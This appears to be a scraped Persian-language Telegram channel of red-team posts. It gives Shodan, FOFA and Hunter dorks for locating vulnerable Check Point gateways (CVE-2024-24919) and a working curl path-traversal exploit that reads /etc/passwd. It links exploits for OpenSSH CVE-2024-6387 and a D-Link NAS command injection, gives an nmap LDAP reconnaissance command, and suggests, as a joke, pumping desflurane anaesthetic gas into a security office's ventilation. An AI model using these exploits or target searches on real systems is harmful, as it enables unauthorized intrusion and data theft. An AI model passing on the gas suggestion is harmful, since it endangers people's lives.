چنتا کتاب دیگه هم که تو بحث Post Exploit و Red team شاید دنبالشون باشین
خودم برسی نکردم همرو
@matitanium
خودم برسی نکردم همرو
@matitanium
❤5👍1
حمله فیزیکی به یک سازمان که حراستش خیلی گیره؟
2واحد دسفلوران در سیستم تهویه هوا اتاق حراست تزریق کنید!✅
2واحد دسفلوران در سیستم تهویه هوا اتاق حراست تزریق کنید!✅
😈10👍1
CVE-2024–24919
. Dorks
Hunter: /product.name="Check Point SSL Network Extender"
FOFA: noscript="Check Point SSL Network Extender"
SHODAN: http.noscript="Check Point SSL Network Extender"
@matitanium
. Dorks
Hunter: /product.name="Check Point SSL Network Extender"
FOFA: noscript="Check Point SSL Network Extender"
SHODAN: http.noscript="Check Point SSL Network Extender"
@matitanium
CyberSecurity
CVE-2024–24919 . Dorks Hunter: /product.name="Check Point SSL Network Extender" FOFA: noscript="Check Point SSL Network Extender" SHODAN: http.noscript="Check Point SSL Network Extender" @matitanium
Exploit
curl -k -X POST "https://{ip}/clients/MyCRL" \ -H "Host: {ip}/" \ -H "User-Agent: Mozilla/5.0 (Macintosh:@Matitanium; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" \ -H "Te: trailers" \ -H "Dnt: 1" \ -H "Connection: keep-alive" \ -H "Content-Length: 48" \ --data "aCSHELL/../../../../../../../../../../../etc/passwd"استفاده از NMAP برای برسی ساختار AD و Domain
دامین کنترل رو پورت اسکن کنید و پروتکل LDAP رو پیدا کنید
معمولا پورت 389
کامند استفاده شده:
nmap -p389 -sV -n — noscript ldap-rootdse <DC-IP>
@matitanium
دامین کنترل رو پورت اسکن کنید و پروتکل LDAP رو پیدا کنید
معمولا پورت 389
کامند استفاده شده:
nmap -p389 -sV -n — noscript ldap-rootdse <DC-IP>
@matitanium
👌4👎1
CVE-2024-6387
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server
#version
SSH-2.0-OpenSSH_8.9p1
Ubuntu-3ubuntu0.10
فقط روی SSH سرور ها با معماری 32 بیت قابل اجرا هستش
#Exploit
https://github.com/asterictnl-lvdw/CVE-2024-6387
@matitanium
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server
#version
SSH-2.0-OpenSSH_8.9p1
Ubuntu-3ubuntu0.10
فقط روی SSH سرور ها با معماری 32 بیت قابل اجرا هستش
#Exploit
https://github.com/asterictnl-lvdw/CVE-2024-6387
@matitanium
GitHub
GitHub - Karmakstylez/CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387) - Karmakstylez/CVE-2024-6387
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
کلی از سازمان ها اینجوری فایروال کانفیگ میکنن 😂😂
تصور کنید سازمان ها از فایروال 2 سال پیش استفاده میکنن و اپدیت نشده
@matitanium
تصور کنید سازمان ها از فایروال 2 سال پیش استفاده میکنن و اپدیت نشده
@matitanium
👍5😐3👌1🗿1
This media is not supported in your browser
VIEW IN TELEGRAM
مفهوم گلوگاه کارت گرافیک 😂
وقتی که حداکثر توان CPU بسیار کمتر از GPU هست و کارت گرافیک نمیتونه به حداکثر قدرتش برسه
@matitanium
وقتی که حداکثر توان CPU بسیار کمتر از GPU هست و کارت گرافیک نمیتونه به حداکثر قدرتش برسه
@matitanium
👍4🔥1👌1
CVE-2024-10914 : D-Link Network Attached Storage 'name'
DNS-3$versions - Unauthenticated OS Command Injection (RCE)
POC : https://github.com/redspy-sec/D-Link
@matitanium
DNS-3$versions - Unauthenticated OS Command Injection (RCE)
POC : https://github.com/redspy-sec/D-Link
@matitanium